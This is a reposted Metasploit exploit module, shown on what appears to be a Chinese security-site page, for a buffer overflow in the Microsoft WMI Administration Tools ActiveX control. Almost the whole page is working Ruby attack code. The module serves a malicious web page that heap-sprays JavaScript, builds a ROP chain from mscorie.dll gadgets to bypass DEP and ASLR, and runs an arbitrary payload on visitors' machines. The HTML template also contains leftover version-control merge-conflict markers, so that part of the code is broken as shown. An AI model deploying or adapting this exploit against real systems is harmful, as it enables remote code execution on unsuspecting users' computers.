首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft WMI Administration Tools ActiveX Buffer Overflow
来源:http://www.metasploit.com 作者:WooYun 发布时间:2010-12-24   
##
# $Id: wmi_admintools.rb 11405 2010-12-23 01:36:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:rank       => NormalRanking,
		:vuln_test  => nil,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft WMI Administration Tools ActiveX Buffer Overflow',
			'Description'    => %q{
					This module exploits a memory trust issue in the Microsoft WMI
				Administration tools ActiveX control. When processing a specially crafted
				HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat
				the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods
				as a trusted pointer. It makes an indirect call via this pointer which leads
				to arbitrary code execution.

				This exploit utilizes a combination of heap spraying and the
				.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
				opt-in to ASLR. As such, this module should be reliable on all Windows
				versions.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'WooYun', 'MC', 'jduck' ],
			'Version'        => '$Revision: 11405
, 'References' => [ [ 'OSVDB', '69942'], [ 'URL', 'http://wooyun.org/bug.php?action=view&id=1006' ], [ 'URL', 'http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf' ], # .NET 2.0 ROP (slide 25) [ 'URL', 'http://secunia.com/advisories/42693' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 512, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], [ 'Windows Universal', { 'SprayTarget' => 0x105ae020 } ], [ 'Debug Target (Crash)', { 'SprayTarget' => 0x70707070 } ] # must be < 0x80000000 ], 'DisclosureDate' => 'Dec 21 2010', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def auto_target(cli, request) mytarget = nil agent = request.headers['User-Agent'] #print_status("Checking user agent: #{agent}") if agent =~ /MSIE 6\.0/ or agent =~ /MSIE 7\.0/ or agent =~ /MSIE 8\.0/ mytarget = targets[1] else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end mytarget end def on_request_uri(cli, request) mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) if (not mytarget) send_not_found(cli) return end end if request.uri == get_resource() or request.uri =~ /\/$/ print_status("Sending #{self.refname} redirect to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") redir = get_resource() redir << '/' if redir[-1,1] != '/' redir << rand_text_alphanumeric(4+rand(4)) redir << '.html' send_redirect(cli, redir) elsif request.uri =~ /\.html?$/ # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.refname} HTML to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") # Generate the ROP payload buf_addr = mytarget['SprayTarget'] rvas = rvas_mscorie_v2() rop_stack = generate_rop(buf_addr, rvas) fix_esp = rva2addr(rvas, 'pop ebp / ret') pivot1 = rva2addr(rvas, 'call [ecx+4] / xor eax, eax / pop ebp / ret 8') pivot2 = rva2addr(rvas, 'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret') pivot_str = Rex::Text.to_unescape([pivot1].pack('V')) special_sauce = [ buf_addr + 0x10, pivot2, # becomes eip via trusted ptr fix_esp, 0xdeadbeef, pivot1, # used by AddContextRef pivot1 # used by ReleaseContext ].pack('V*') # Append the payload to the rop_stack rop_stack << p.encoded # Add in the rest of the ROP stack special_sauce << rop_stack special_sauce = Rex::Text.to_unescape(special_sauce) shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) nops = Rex::Text.to_unescape(make_nops(4)) js_function = rand_text_alpha(rand(32)+1) vname = rand_text_alpha(rand(32) + 1) rand1 = rand_text_alpha(rand(32) + 1) rand2 = rand_text_alpha(rand(32) + 1) rand3 = rand_text_alpha(rand(32) + 1) rand4 = rand_text_alpha(rand(32) + 1) rand5 = rand_text_alpha(rand(32) + 1) rand6 = rand_text_alpha(rand(32) + 1) rand7 = rand_text_alpha(rand(32) + 1) rand8 = rand_text_alpha(rand(32) + 1) clsid = "2745E5F5-D234-11D0-847A-00C04FD7BB08" progid = "WBEM.SingleViewCtrl.1" method_names = [ "AddContextRef", "ReleaseContext" ] method_name = method_names[rand(method_names.length)] # Construct the heap spray javascript custom_js = <<-EOS function #{js_function}() { heap = new heapLib.ie(0x20000); var heapspray = unescape("#{special_sauce}"); while(heapspray.length < 0x1000) heapspray += unescape("%u4444"); var heapblock = heapspray; while(heapblock.length < 0x40000) heapblock += heapblock; finalspray = heapblock.substring(2, 0x40000 - 0x21); for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); } #{vname}.#{method_name}(#{"0x%x" % buf_addr}); } EOS js = heaplib(custom_js) dll_uri = get_resource() dll_uri << '/' if dll_uri[-1,1] != '/' dll_uri << "generic-" + Time.now.to_i.to_s + ".dll" # Construct the final page content = <<-EOS <html> <<<<<<< .mine <head> <script language='javascript'> #{js} ======= <object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="#{vname}"></object> <script> #{rand1} = unescape('#{shellcode}'); #{rand2} = unescape('%u0c0c%u0c0c'); #{rand3} = 20; #{rand4} = #{rand3} + #{rand1}.length; while(#{rand2}.length < #{rand4}) #{rand2} += #{rand2}; #{rand5} = #{rand2}.substring(0, #{rand4}); #{rand6} = #{rand2}.substring(0, #{rand2}.length - #{rand4}); while( #{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5}; #{rand7} = new Array(); for(#{rand8} = 0; #{rand8} < 450; #{rand8}++) #{rand7}[#{rand8}] = #{rand6} + #{rand1}; #{vname}.#{method_name}(0x0c0c0c0c); >>>>>>> .r11397 </script> </head> <body onload='#{js_function}()'> <object classid="#{dll_uri}#GenericControl" /> <object classid="clsid:#{clsid}" id="#{vname}"></object> </body> </html> EOS # Transmit the response to the client send_response_html(cli, content) elsif request.uri =~ /\.dll$/ print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually # use it's contents ... ibase = (0x2000 | rand(0x8000)) << 16 dll = Msf::Util::EXE.to_dotnetmem(ibase, rand_text(16)) # Send a .NET v2.0 DLL down send_response(cli, dll, { 'Content-Type' => 'application/x-msdownload', 'Connection' => 'close', 'Pragma' => 'no-cache' }) end # Handle the payload handler(cli) end def rvas_mscorie_v2() # mscorie.dll version v2.0.50727.3053 # Just return this hash { 'call [ecx+4] / xor eax, eax / pop ebp / ret 8' => 0x237e, 'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b, 'pop ebp / ret' => 0x5557, 'call [ecx] / pop ebp / ret 0xc' => 0x1ec4, 'pop eax / ret' => 0x5ba1, 'pop ebx / ret' => 0x54c0, 'pop ecx / ret' => 0x1e13, 'pop esi / ret' => 0x1d9a, 'pop edi / ret' => 0x2212, 'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6, 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154, } end def generate_rop(buf_addr, rvas) # ROP fun! (XP SP3 English, Dec 15 2010) rvas.merge!({ # Instructions / Name => RVA 'BaseAddress' => 0x63f00000, 'imp_VirtualAlloc' => 0x10f4 }) rop_stack = [ # Allocate an RWX memory segment 'pop ecx / ret', 'imp_VirtualAlloc', 'call [ecx] / pop ebp / ret 0xc', 0, # lpAddress 0x1000, # dwSize 0x3000, # flAllocationType 0x40, # flProt :unused, # Copy the original payload 'pop ecx / ret', :unused, :unused, :unused, :memcpy_dst, 'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc', :unused, 'pop esi / ret', :unused, :unused, :unused, :memcpy_src, 'pop edi / ret', 0xdeadf00d # to be filled in above ] (0x200 / 4).times { rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' } # Execute the payload ;) rop_stack << 'call [ecx] / pop ebp / ret 0xc' rop_stack.map! { |e| if e.kind_of? String # Meta-replace (RVA) raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e] rvas['BaseAddress'] + rvas[e] elsif e == :unused # Randomize rand_text(4).unpack('V').first elsif e == :memcpy_src # Based on stack length.. buf_addr + 0x18 + (rop_stack.length * 4) elsif e == :memcpy_dst # Store our new memory ptr into our buffer for later popping :) buf_addr + 0x18 + (21 * 4) else # Literal e end } rop_stack.pack('V*') end def rva2addr(rvas, key) raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key] rvas['BaseAddress'] + rvas[key] end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DorsaCms SQL Injection Vulnera
·Mitel Audio and Web Conferenci
·WMITools ActiveX Remote Comman
·Citrix Access Gateway Command
·Apple iPhone Safari (JS .) Rem
·HttpBlitz Web Server Denial Of
·Kolibri v2.0 Buffer Overflow R
·Windows 7 IIS7.5 FTPSVC UNAUTH
·Apple iPhone Safari (decodeURI
·Internet Explorer CSS Recursiv
·Linux Kernel < 2.6.36-rc1 CAN
·Redmine SCM Repository Arbitra
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved